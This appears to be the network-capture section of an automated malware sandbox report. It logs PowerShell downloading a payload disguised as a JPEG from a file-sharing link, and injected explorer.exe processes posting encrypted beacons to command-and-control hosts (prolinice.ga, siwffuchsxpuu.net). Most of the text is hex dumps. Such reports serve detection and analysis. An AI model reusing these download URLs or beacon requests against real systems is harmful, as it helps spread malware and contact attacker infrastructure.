                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823468924 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823482990 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823494911 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824312925 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824326992 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824338913 CET1060INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.825136900 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwGdjWmrttLZ0zd70IE91TXkF6ejvOI+M2Yb03Y6t1ejOAAtMT71bR
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.829281092 CET1236INData Raw: 72 4c 43 68 63 64 35 6f 55 61 56 47 54 55 52 36 54 55 42 46 68 4c 52 48 58 6b 6c 55 68 65 34 58 61 30 39 46 41 74 32 47 57 51 34 48 68 4a 64 55 5a 63 51 78 5a 39 41 49 4e 68 31 35 67 55 32 57 76 50 53 62 61 2f 58 35 6c 2f 55 54 6c 4d 51 55 44 64
                                                                                                                                                                                                                            Data Ascii: rLChcd5oUaVGTUR6TUBFhLRHXklUhe4Xa09FAt2GWQ4HhJdUZcQxZ9AINh15gU2WvPSba/X5l/UTlMQUDdS4fNmJp71apEREXdLGUtOKIUSH8oRGUoWENbR+QUUFRORbUkpElNZBQeW6lwN3U8OFTcBH3j4qhEJEX9fEjpQcpYrBZWRZS2DWXRBLtplAdKBQRKyHf1xDV20ALw1EVQTrb5AJRslUhkG3b8JEUtOIEUWF40OYfT1


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.44978146.173.214.24802580C:\Windows\explorer.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.977413893 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Referer: http://siwffuchsxpuu.net/
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                            Content-Length: 210
                                                                                                                                                                                                                            Host: prolinice.ga
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.977498055 CET210OUTData Raw: 6e e2 99 f7 cc 38 88 61 6a 16 b1 1a 4f 2a fa 85 da 24 e8 54 32 8b be 9a 83 eb 79 65 dd 3a 46 08 40 b8 99 b1 0f d8 85 a6 15 c8 c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 1f b7 e0 91
                                                                                                                                                                                                                            Data Ascii: n8ajO*$T2ye:F@ &7H8.6hEv:RY;PLgc`(Q5V[\yU75VV"tbw;evND~ewAtRom6OhVvRn&D+QS
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197149992 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            Date: Mon, 18 Nov 2024 17:38:08 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.59 (Debian)
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                            Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~Yr [TRUNCATED]
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197285891 CET212INData Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b
                                                                                                                                                                                                                            Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?y
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197300911 CET1236INData Raw: 99 65 d5 2d f5 67 a5 df 07 1c 74 f5 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8 06 83 3a dd 3c bd f3 ae 0b 02 a2 80 23 7f 02 79 66 c6 fa 48 ee 4a d1 79 d0 3c 96 bd 13 34 1f 1d 11 5e 2f 7c 94 67 02 e3 78
                                                                                                                                                                                                                            Data Ascii: e-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z|-t[DDgd/pXLid*C!@qv^=:g{
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197504997 CET212INData Raw: b0 08 1a b5 21 fe 8d 1b a2 44 ad 36 e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de c1 ce 9f 6e 32 2b 10 77 b2 d9 30 2f 02 81 e1 38 a6 a6 13 f3 02 84 36 53 75 ea a1 a0 c1 cc 39 0a f5 bc 99 22 4d 2e 18 6b bc
                                                                                                                                                                                                                            Data Ascii: !D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]FsF[7)
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197519064 CET1236INData Raw: af 3a 6c 97 46 70 b8 0c e8 e6 3f e1 85 14 d7 e0 2e 25 a9 38 2a 73 2c 74 cf a0 e1 8a 21 e5 cc 74 4e a8 32 b8 f3 59 06 7e c8 97 a2 52 d1 3b f3 01 8c 76 b3 d5 7b 5b f2 3f d4 ca a3 fe 45 99 65 a9 46 0c c8 d1 f7 1f e4 54 f5 10 fc ce 88 74 e7 42 5f 91
                                                                                                                                                                                                                            Data Ascii: :lFp?.%8*s,t!tN2Y~R;v{[?EeFTtB_eJ1|Okr3f5v_L-pSm*aB D.N]SV1|)MVk=EpVqn*ozEAUoD(m]WE@?~xQ1HGw2
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197536945 CET1236INData Raw: 81 dd 5d f8 89 4b 96 e0 e1 2a 14 5f e6 f9 6b 02 6b 4f 6c 79 31 a9 d3 e0 54 70 ab 60 e7 0d 7c 5f 54 d7 a3 e5 a5 49 27 b0 e8 2c d8 7b 8c f1 e6 bc ae 1e d8 22 74 a4 f8 44 c1 8b f3 0f 22 96 47 1e 06 a7 4c 6d 0f 32 42 4e 51 d6 4d 0c e0 89 5b 50 5b 9c
                                                                                                                                                                                                                            Data Ascii: ]K*_kkOly1Tp`|_TI',{"tD"GLm2BNQM[P[5z*}=i6:w^\n?N,-O~x:w8@Y=p7P0l;PR@(p-3*}n`C3:I?wvIJQ#{3y
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197912931 CET424INData Raw: dc 61 25 60 a3 07 77 91 d8 25 0e 42 16 8f 82 ec 45 59 18 4d 6d cf 51 35 8d 50 49 d2 86 51 a3 23 18 c3 ce 6e d4 51 6f c1 f2 ea c0 24 49 28 d1 7e 6d 65 d1 16 3f a6 a1 41 49 0b cb 6f 5f 57 ef 48 bd ba 25 75 0e 0f 6d 6b 27 82 15 7a 05 46 4b 48 a8 59
                                                                                                                                                                                                                            Data Ascii: a%`w%BEYMmQ5PIQ#nQo$I(~me?AIo_WH%umk'zFKHYIvCt/i9*M=yS>f(`~q,m/~(mApme\(sD7!yg$vSm5z17;`JJ{
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197995901 CET1236INData Raw: 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4 f5 71 c8 8c eb
                                                                                                                                                                                                                            Data Ascii: omSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVpECH$H;\l=gK3c{R\Qo
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198194027 CET212INData Raw: 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f a8 24 40 4b f4
                                                                                                                                                                                                                            Data Ascii: 8|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[f
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198208094 CET1236INData Raw: 8f de 66 96 dc f2 c7 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b
                                                                                                                                                                                                                            Data Ascii: f0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.44981746.173.214.24804928C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780714035 CET275OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Referer: http://prolinice.ga/
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                            Content-Length: 4431
                                                                                                                                                                                                                            Host: prolinice.ga
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780919075 CET4431OUTData Raw: 6e e2 99 f7 cc 38 88 61 6a 16 b1 1a 4f 2a fa 85 da 24 e8 54 32 8b be 9a 83 eb 79 65 dd 3a 46 08 40 b8 99 b1 0f d8 85 a6 15 c8 c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2
                                                                                                                                                                                                                            Data Ascii: n8ajO*$T2ye:F@eug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x*>x :xGresn*q~jE%oux^2~mt-GD#SO`tAEi*y}`8
                                                                                                                                                                                                                            Nov 18, 2024 18:38:17.020526886 CET584INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            Date: Mon, 18 Nov 2024 17:38:16 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.59 (Debian)
                                                                                                                                                                                                                            Content-Length: 409
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449731142.215.209.784435568C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-18 17:37:25 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                                                                                                                            Host: 1017.filemail.com
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-11-18 17:37:25 UTC324INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Content-Length: 2230233
                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                                                                                                                            X-Transfer-ID: wxhdiueivoluihj
                                                                                                                                                                                                                            Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                                                                                                                            Date: Mon, 18 Nov 2024 17:37:25 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2024-11-18 17:37:25 UTC639INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                            2024-11-18 17:37:25 UTC8192INData Raw: 16 4f de a3 82 3a 1f 71 97 33 6e 16 1b 33 f4 cc 56 6d 8a 6d 1b bf b1 f7 c6 d8 50 e1 af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99
                                                                                                                                                                                                                            Data Ascii: O:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>u
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: a9 fc 58 e9 fb 5f a6 50 2b 4c e5 7a 13 79 e1 bc 42 2a 61 a9 8d 02 c8 a6 d9 47 42 31 cd 36 a9 75 11 2d 46 a2 c7 3f 3c 0f 58 df 6c 34 ca 50 9d 34 84 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b
                                                                                                                                                                                                                            Data Ascii: X_P+LzyB*aGB16u-F?<Xl4P411Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQ
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: 73 47 3c 5a 69 01 28 d2 28 01 85 90 db 85 1c b4 ce 91 78 56 99 24 2c d1 cc 01 6e 6f 69 1d 19 6f a7 c7 dc 58 c6 f5 7a 00 be 27 a4 d4 c6 86 9a 64 0c 07 66 dc 39 cb c9 a0 fb e7 84 c4 81 4e e5 1b 85 9a e7 a6 07 43 a8 95 34 e9 b7 4f 24 aa 16 96 45 60 55 be 3f eb a6 0b 5a 27 d5 a4 4a ba 49 54 ac 81 ad aa bf 9e 2b a2 d6 cd e1 c1 a3 91 19 94 1f c2 7a fd 0e 69 b6 b2 49 d5 0e 8e 16 70 dc 6f 7f 48 46 f8 df 24 8f 87 18 04 d5 43 f7 88 5e 06 ea ca 05 76 1f 2f ae 62 f8 53 24 5a a9 74 d3 00 55 bd 2d 7e e3 3d 1a 21 da 03 b6 e9 07 0c f5 41 8f bd 66 1f 8d e8 ca 6a a3 9a 2b b9 78 35 fe 2c 05 7c 4c ed f1 26 9a 14 20 2d 29 6e c5 80 cd 4d 4e af ef 1a 14 58 da de 62 b1 11 57 57 d7 f4 bc 28 d0 2b 78 59 d3 85 3b b6 ee 27 be ec cf f0 4d 37 9d 2b cf 28 65 55 b5 5f 89 3d 70 0f e2 7e
                                                                                                                                                                                                                            Data Ascii: sG<Zi((xV$,noioXz'df9NC4O$E`U?Z'JIT+ziIpoHF$C^v/bS$ZtU-~=!Afj+x5,|L& -)nMNXbWW(+xY;'M7+(eU_=p~
